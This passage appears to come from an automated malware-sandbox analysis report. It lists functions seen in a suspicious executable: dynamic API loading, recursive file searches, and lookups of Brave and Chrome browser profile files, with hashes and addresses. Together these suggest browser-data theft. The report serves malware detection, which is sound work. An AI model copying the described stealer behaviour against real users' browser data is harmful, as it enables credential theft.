tP]q, xrefs: 07830D25
4']q, xrefs: 07830BE7
$]q, xrefs: 07830CBA

Memory Dump Source

Source File: 00000007.00000002.2130178307.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7830000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$tP]q$tP]q$#mk$$]q$$]q$$]q$sl$sl
API String ID: 0-3758080517
Opcode ID: 8347fc61e7492e99d65b1c4286f354bf577469adda4757f7dc02412e53d3f55e
Instruction ID: 5f9baca9883d237a0fb217d5d2e6ae3a1b3d18ff16ed7868abdf8b711d8c5069
Opcode Fuzzy Hash: 8347fc61e7492e99d65b1c4286f354bf577469adda4757f7dc02412e53d3f55e
Instruction Fuzzy Hash: 2EA168B270421A8FCB148F6D840576ABBE7AFD1720F1984BBD449CB251DB31D842C7E2

Uniqueness

Uniqueness Score: -1.00%

Function 07833560 Relevance: 6.3, Strings: 5, Instructions: 71COMMON

Download Yara Rule

Strings

sl, xrefs: 078335DD
$]q, xrefs: 0783359A
$]q, xrefs: 078335A6
sl, xrefs: 078335EB
$]q, xrefs: 0783356F

Memory Dump Source

Source File: 00000007.00000002.2130178307.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7830000_powershell.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$sl$sl
API String ID: 0-445436234
Opcode ID: 240de84d8e8d06939bf53c648f07cda8836780c5cbac5fd1e06d58ce6b3a8a85
Instruction ID: c570a40f25404b3e6d856f40ff145d340adb475d2f3c7626c4293d211e71039c
Opcode Fuzzy Hash: 240de84d8e8d06939bf53c648f07cda8836780c5cbac5fd1e06d58ce6b3a8a85
Instruction Fuzzy Hash: 0B11E9B171031A9BDB245D5E8845B67BF96ABE1725F24842BE489C7781CA31C845C3D1

Uniqueness

Uniqueness Score: -1.00%

Function 078338F0 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$]q, xrefs: 07833958
$]q, xrefs: 07833902
$]q, xrefs: 0783391E
$]q, xrefs: 0783394C

Memory Dump Source

Source File: 00000007.00000002.2130178307.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7830000_powershell.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: 22cc86832785f3d1fd6012c189f51d2e39663f14158548fb52696bccddbba800
Instruction ID: 02f4a2332b3aa62b27c8d6cf47bbc4571319adc0881361ad45fa3c89c5a08a57
Opcode Fuzzy Hash: 22cc86832785f3d1fd6012c189f51d2e39663f14158548fb52696bccddbba800
Instruction Fuzzy Hash: B5216BB2710306EBDB245D7E9841B37BADA9BE2715F24842AAD45CB781CD35C981C3E1

Uniqueness

Uniqueness Score: -1.00%

Function 07830309 Relevance: 5.0, Strings: 4, Instructions: 44COMMON

Download Yara Rule

Strings

4']q, xrefs: 0783037F
$]q, xrefs: 07830352
$]q, xrefs: 0783035E
4']q, xrefs: 07830373

Memory Dump Source

Source File: 00000007.00000002.2130178307.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7830000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$$]q$$]q
API String ID: 0-978391646
Opcode ID: f7a8f744ff7b859707beda04b39ab67ce6f30b631e26c40246a5092e36c68dba
Instruction ID: f123f51c2c4201874999eaa5b6df68618479640f49678f4f3320ef4e4e905dfa
Opcode Fuzzy Hash: f7a8f744ff7b859707beda04b39ab67ce6f30b631e26c40246a5092e36c68dba
Instruction Fuzzy Hash: 7601F9B17182468FC72A5B1C48617757BE3AF82A14F2A00EBC451CF353CE285C4587E7

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: u2xs.0.exePID: 5788, Parent PID: 3808COMMON

Execution Graph

Execution Coverage:	4.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.4%
Total number of Nodes:	2000
Total number of Limit Nodes:	42

Executed Functions

Function 00416240 Relevance: 165.7, APIs: 110, Instructions: 674
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75900000,04263D80), ref: 0041625D
GetProcAddress.KERNEL32(75900000,04264420), ref: 00416275
GetProcAddress.KERNEL32(75900000,042809C0), ref: 0041628E
GetProcAddress.KERNEL32(75900000,04280A68), ref: 004162A6
GetProcAddress.KERNEL32(75900000,04280A08), ref: 004162BE
GetProcAddress.KERNEL32(75900000,042809D8), ref: 004162D7
GetProcAddress.KERNEL32(75900000,0427FB08), ref: 004162EF
GetProcAddress.KERNEL32(75900000,04280A20), ref: 00416307
GetProcAddress.KERNEL32(75900000,042809F0), ref: 00416320
GetProcAddress.KERNEL32(75900000,04280A38), ref: 00416338
GetProcAddress.KERNEL32(75900000,04280A50), ref: 00416350
GetProcAddress.KERNEL32(75900000,042643A0), ref: 00416369
GetProcAddress.KERNEL32(75900000,042640E0), ref: 00416381
GetProcAddress.KERNEL32(75900000,04264120), ref: 00416399
GetProcAddress.KERNEL32(75900000,042643C0), ref: 004163B2
GetProcAddress.KERNEL32(75900000,04285868), ref: 004163CA
GetProcAddress.KERNEL32(75900000,04285A60), ref: 004163E2
GetProcAddress.KERNEL32(75900000,0427FAB8), ref: 004163FB
GetProcAddress.KERNEL32(75900000,042641A0), ref: 00416413
GetProcAddress.KERNEL32(75900000,04285AD8), ref: 0041642B
GetProcAddress.KERNEL32(75900000,04285A30), ref: 00416444
GetProcAddress.KERNEL32(75900000,042859B8), ref: 0041645C
GetProcAddress.KERNEL32(75900000,04285988), ref: 00416474
GetProcAddress.KERNEL32(75900000,04264220), ref: 0041648D
GetProcAddress.KERNEL32(75900000,04285A00), ref: 004164A5
GetProcAddress.KERNEL32(75900000,04285940), ref: 004164BD
GetProcAddress.KERNEL32(75900000,04285898), ref: 004164D6
GetProcAddress.KERNEL32(75900000,042859D0), ref: 004164EE
GetProcAddress.KERNEL32(75900000,04285A78), ref: 00416506
GetProcAddress.KERNEL32(75900000,04285880), ref: 0041651F
GetProcAddress.KERNEL32(75900000,04285A18), ref: 00416537
GetProcAddress.KERNEL32(75900000,042859E8), ref: 0041654F
GetProcAddress.KERNEL32(75900000,04285A48), ref: 00416568
GetProcAddress.KERNEL32(75900000,04282A40), ref: 00416580
GetProcAddress.KERNEL32(75900000,04285A90), ref: 00416598
GetProcAddress.KERNEL32(75900000,04285AF0), ref: 004165B1
GetProcAddress.KERNEL32(75900000,04264380), ref: 004165C9
GetProcAddress.KERNEL32(75900000,042858B0), ref: 004165E1
GetProcAddress.KERNEL32(75900000,042640C0), ref: 004165FA
GetProcAddress.KERNEL32(75900000,04285AA8), ref: 00416612
GetProcAddress.KERNEL32(75900000,04285AC0), ref: 0041662A
GetProcAddress.KERNEL32(75900000,04264280), ref: 00416643
GetProcAddress.KERNEL32(75900000,04264240), ref: 0041665B
LoadLibraryA.KERNEL32(042858C8,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 0041666D
LoadLibraryA.KERNEL32(04285B08,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 0041667E
LoadLibraryA.KERNEL32(04285970,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 00416690
LoadLibraryA.KERNEL32(04285820,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166A2
LoadLibraryA.KERNEL32(042858E0,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166B3
LoadLibraryA.KERNEL32(04285850,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166C5
LoadLibraryA.KERNEL32(042859A0,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166D7
LoadLibraryA.KERNEL32(04285838,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166E8
GetProcAddress.KERNEL32(75FD0000,04264400), ref: 0041670A
GetProcAddress.KERNEL32(75FD0000,042858F8), ref: 00416722
GetProcAddress.KERNEL32(75FD0000,04280430), ref: 0041673A
GetProcAddress.KERNEL32(75FD0000,04285928), ref: 00416753
GetProcAddress.KERNEL32(75FD0000,04264200), ref: 0041676B
GetProcAddress.KERNEL32(73BC0000,0427FC98), ref: 00416790
GetProcAddress.KERNEL32(73BC0000,04264100), ref: 004167A9
GetProcAddress.KERNEL32(73BC0000,0427FB58), ref: 004167C1
GetProcAddress.KERNEL32(73BC0000,04285910), ref: 004167D9
GetProcAddress.KERNEL32(73BC0000,04285958), ref: 004167F2
GetProcAddress.KERNEL32(73BC0000,04264260), ref: 0041680A
GetProcAddress.KERNEL32(73BC0000,04264180), ref: 00416822
GetProcAddress.KERNEL32(73BC0000,04285BB0), ref: 0041683B
GetProcAddress.KERNEL32(763B0000,042641C0), ref: 0041685C
GetProcAddress.KERNEL32(763B0000,04264440), ref: 00416874
GetProcAddress.KERNEL32(763B0000,04285B98), ref: 0041688D
GetProcAddress.KERNEL32(763B0000,04285B80), ref: 004168A5
GetProcAddress.KERNEL32(763B0000,04264460), ref: 004168BD
GetProcAddress.KERNEL32(750F0000,0427F7E8), ref: 004168E3
GetProcAddress.KERNEL32(750F0000,0427F810), ref: 004168FB
GetProcAddress.KERNEL32(750F0000,04285BC8), ref: 00416913
GetProcAddress.KERNEL32(750F0000,042642C0), ref: 0041692C
GetProcAddress.KERNEL32(750F0000,042643E0), ref: 00416944
GetProcAddress.KERNEL32(750F0000,0427F838), ref: 0041695C
GetProcAddress.KERNEL32(75A50000,04285B38), ref: 00416982
GetProcAddress.KERNEL32(75A50000,04264320), ref: 0041699A
GetProcAddress.KERNEL32(75A50000,042802F0), ref: 004169B2
GetProcAddress.KERNEL32(75A50000,04285BE0), ref: 004169CB
GetProcAddress.KERNEL32(75A50000,04285B20), ref: 004169E3
GetProcAddress.KERNEL32(75A50000,042642A0), ref: 004169FB
GetProcAddress.KERNEL32(75A50000,04264140), ref: 00416A14
GetProcAddress.KERNEL32(75A50000,04285B50), ref: 00416A2C
GetProcAddress.KERNEL32(75A50000,04285B68), ref: 00416A44
GetProcAddress.KERNEL32(75070000,042642E0), ref: 00416A66
GetProcAddress.KERNEL32(75070000,04285FB8), ref: 00416A7E
GetProcAddress.KERNEL32(75070000,042861E0), ref: 00416A96
GetProcAddress.KERNEL32(75070000,042861F8), ref: 00416AAF
GetProcAddress.KERNEL32(75070000,04286108), ref: 00416AC7
GetProcAddress.KERNEL32(74E50000,042641E0), ref: 00416AE8
GetProcAddress.KERNEL32(74E50000,04264300), ref: 00416B01
GetProcAddress.KERNEL32(75320000,04264340), ref: 00416B22
GetProcAddress.KERNEL32(75320000,04285F40), ref: 00416B3A
GetProcAddress.KERNEL32(6F080000,04264360), ref: 00416B60
GetProcAddress.KERNEL32(6F080000,04264160), ref: 00416B78
GetProcAddress.KERNEL32(6F080000,04286830), ref: 00416B90
GetProcAddress.KERNEL32(6F080000,04285FD0), ref: 00416BA9
GetProcAddress.KERNEL32(6F080000,04286B50), ref: 00416BC1
GetProcAddress.KERNEL32(6F080000,04286850), ref: 00416BD9
GetProcAddress.KERNEL32(6F080000,042868D0), ref: 00416BF2
GetProcAddress.KERNEL32(6F080000,04286B30), ref: 00416C0A
GetProcAddress.KERNEL32(74E00000,042860A8), ref: 00416C2B
GetProcAddress.KERNEL32(74E00000,04280310), ref: 00416C44
GetProcAddress.KERNEL32(74E00000,04286210), ref: 00416C5C
GetProcAddress.KERNEL32(74E00000,04286138), ref: 00416C74
GetProcAddress.KERNEL32(74DF0000,04286A70), ref: 00416C96
GetProcAddress.KERNEL32(6C1B0000,04286090), ref: 00416CB7
GetProcAddress.KERNEL32(6C1B0000,042869D0), ref: 00416CCF
GetProcAddress.KERNEL32(6C1B0000,04286120), ref: 00416CE8
GetProcAddress.KERNEL32(6C1B0000,04286048), ref: 00416D00

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: ce70c898548f88182f5d017b929846a165f52d01e2510d34cdd7b30da02966dd
Instruction ID: 6fdcbfc83a7e6ced85b92bf4002cf1d70b18d179e1e2f66c0d1faa926a602d30
Opcode Fuzzy Hash: ce70c898548f88182f5d017b929846a165f52d01e2510d34cdd7b30da02966dd
Instruction Fuzzy Hash: 6E623EB5510E10AFC374DFA8FE88A1637ABBBCC311311A519A60AC72A4DF759483CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00411650 Relevance: 44.0, APIs: 20, Strings: 5, Instructions: 237
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00411669
FindFirstFileA.KERNEL32(?,?), ref: 00411680
lstrcat.KERNEL32(?,?), ref: 004116D2
StrCmpCA.SHLWAPI(?,0041D7F8), ref: 004116E4
StrCmpCA.SHLWAPI(?,0041D7FC), ref: 004116FA
FindNextFileA.KERNELBASE(000000FF,?), ref: 00411980
FindClose.KERNEL32(000000FF), ref: 00411995

Strings

%s\%s, xrefs: 00411714
%s\%s\%s, xrefs: 004117DB
%s\%s, xrefs: 004117FD
%s%s, xrefs: 00411838
%s\*, xrefs: 0041165D

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
API String ID: 1125553467-2524465048
Opcode ID: a1e4a5bbde939c9024b94845e9ad48a2aa5974f548fd36c828e1390b463ccdcb
Instruction ID: 56f1237c2d7c520c90c98f1ce5fb3a6d9b51b415e2d0c2f733ce4a2014328567
Opcode Fuzzy Hash: a1e4a5bbde939c9024b94845e9ad48a2aa5974f548fd36c828e1390b463ccdcb
Instruction Fuzzy Hash: AE9172B19006189BDB24EFA4DC85FEA737DBF88300F044589F61A92191DB789AC5CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040B610 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindFirstFileA.KERNEL32(00000000,?,0041D71A,0041D717,00000000,?,?,?,0041DB54,0041D716), ref: 0040B695
StrCmpCA.SHLWAPI(?,0041DB58), ref: 0040B6ED
StrCmpCA.SHLWAPI(?,0041DB5C), ref: 0040B703
FindNextFileA.KERNELBASE(000000FF,?), ref: 0040BF3B
FindClose.KERNEL32(000000FF), ref: 0040BF4D

Strings

\Brave\Preferences, xrefs: 0040B97B
Google Chrome, xrefs: 0040BDB9
Brave, xrefs: 0040B8A2
Preferences, xrefs: 0040B8BE

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-726946144
Opcode ID: 5c2962d3e858960f29f3766096d2c99253bf8f8e46e213816a8357ee106e5c07
Instruction ID: 76d401781d3fce7c968e745dc043d6a6225f477281f2400f678919b217ba5a4c
Opcode Fuzzy Hash: 5c2962d3e858960f29f3766096d2c99253bf8f8e46e213816a8357ee106e5c07
Instruction Fuzzy Hash: 0F423572A0010457CF14FB61DC56EEE773DAF84304F41455EF90AA6181EE38AB89CBE9

Uniqueness

Uniqueness Score: -1.00%

Function 68C135A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(68C9F688,00001000), ref: 68C135D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 68C135E0
QueryPerformanceFrequency.KERNEL32(?), ref: 68C135FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 68C1363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 68C1369F
__aulldiv.LIBCMT ref: 68C136E4
QueryPerformanceCounter.KERNEL32(?), ref: 68C13773
EnterCriticalSection.KERNEL32(68C9F688), ref: 68C1377E
LeaveCriticalSection.KERNEL32(68C9F688), ref: 68C137BD
QueryPerformanceCounter.KERNEL32(?), ref: 68C137C4
EnterCriticalSection.KERNEL32(68C9F688), ref: 68C137CB
LeaveCriticalSection.KERNEL32(68C9F688), ref: 68C13801
__aulldiv.LIBCMT ref: 68C13883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 68C13902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 68C13918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 68C1394C

Strings

GenuntelineI, xrefs: 68C13639
GTC, xrefs: 68C13912
QPC, xrefs: 68C138FC
AuthcAMDenti, xrefs: 68C13946
MOZ_TIMESTAMP_MODE, xrefs: 68C135DB

Memory Dump Source

Source File: 00000008.00000002.3041554680.0000000068C11000.00000020.00000001.01000000.00000018.sdmp, Offset: 68C10000, based on PE: true

Associated: 00000008.00000002.3041520041.0000000068C10000.00000002.00000001.01000000.00000018.sdmpDownload File
Associated: 00000008.00000002.3041646591.0000000068C8D000.00000002.00000001.01000000.00000018.sdmpDownload File
Associated: 00000008.00000002.3041691871.0000000068C9E000.00000004.00000001.01000000.00000018.sdmpDownload File
Associated: 00000008.00000002.3041724661.0000000068CA2000.00000002.00000001.01000000.00000018.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68c10000_u2xs.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: f917405caa121a4e71f145aac4b85b5750479100dabc4b2374e0177c8bb81441
Instruction ID: c6f4fc380d31f7c0edeab5f67762da572ba76599bf65a1393e5bf4f13c890288
Opcode Fuzzy Hash: f917405caa121a4e71f145aac4b85b5750479100dabc4b2374e0177c8bb81441
Instruction Fuzzy Hash: 16B18071A183109FDF08CF38C84561EBBF9BB8A704F4585AEE899D7350E7B4D9018B91

Uniqueness

Uniqueness Score: -1.00%

Function 00412570 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00412589
FindFirstFileA.KERNELBASE(?,?), ref: 004125A0
StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
FindClose.KERNEL32(000000FF), ref: 004127CE

Strings

%s\%s, xrefs: 004125FE
%s\%s, xrefs: 0041264F
%s\*, xrefs: 0041257D

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: ca5a6a913c5a415409d9fac4b41357e54bf8e1917f906e99eecf59a69dd35746
Instruction ID: 16fd5a9597efbfb91ed0225017393bb16e0f77851f83799e5682f8bc7922baf0
Opcode Fuzzy Hash: ca5a6a913c5a415409d9fac4b41357e54bf8e1917f906e99eecf59a69dd35746
Instruction Fuzzy Hash: 676156B2900618ABCB24EBE0DD99EEA737DBF58701F00458DB61A96140EF74DB85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00411B80 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00411B9D
FindFirstFileA.KERNELBASE(?,?), ref: 00411BB4
StrCmpCA.SHLWAPI(?,0041D834), ref: 00411BE2
StrCmpCA.SHLWAPI(?,0041D838), ref: 00411BF8
FindNextFileA.KERNEL32(000000FF,?), ref: 00411D3D
FindClose.KERNEL32(000000FF), ref: 00411D52

Strings

%s\%s, xrefs: 00411B91

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: dc6e8f5f3dd64877ec9c90930099f74867ae354aed28ff4bf18cde7b491b5e6e
Instruction ID: 1beca0db89a34a7d9f561fb59a57ff38f1a0216f2a844ef05cbde65d1a44dc5a
Opcode Fuzzy Hash: dc6e8f5f3dd64877ec9c90930099f74867ae354aed28ff4bf18cde7b491b5e6e
Instruction Fuzzy Hash: D75168B5900618ABCB24EBB0DC85EEA737DBB48304F40458DB65A96050EB79ABC5CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004015C0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215C4,?,00401E03,?,004215C8,?,?,00000000,?,00000000), ref: 00401813
StrCmpCA.SHLWAPI(?,004215CC), ref: 00401863
StrCmpCA.SHLWAPI(?,004215D0), ref: 00401879
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401C30
DeleteFileA.KERNEL32(00000000), ref: 00401CB4
FindNextFileA.KERNEL32(000000FF,?), ref: 00401D0A
FindClose.KERNEL32(000000FF), ref: 00401D1C

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Strings

\*.*, xrefs: 004016E1

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: 79d3eca8692829f218a0a01529043c7ef57d8d1958c9b466b9114582594391c0
Instruction ID: 3aa4ae790513c502dab12fd0122e5550b13815c0fff8c800b600eb4522263f51
Opcode Fuzzy Hash: 79d3eca8692829f218a0a01529043c7ef57d8d1958c9b466b9114582594391c0
Instruction Fuzzy Hash: D41225759102189BCB15FB61DC56EEE7739AF54308F41419EB10A62091EF38AFC9CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040D1C0 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0041DC10,0041D73F), ref: 0040D22B
StrCmpCA.SHLWAPI(?,0041DC14), ref: 0040D273
StrCmpCA.SHLWAPI(?,0041DC18), ref: 0040D289
FindNextFileA.KERNELBASE(000000FF,?), ref: 0040D4EE
FindClose.KERNEL32(000000FF), ref: 0040D500

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: dacb57850d66782377522a9435381e453c63e497f7ff3c65cf8400c43a46bae6
Instruction ID: a7e743a2a4f5118c59e4eb5b7e6cabc454f6fbff0e67e47d23a58287cf68124a
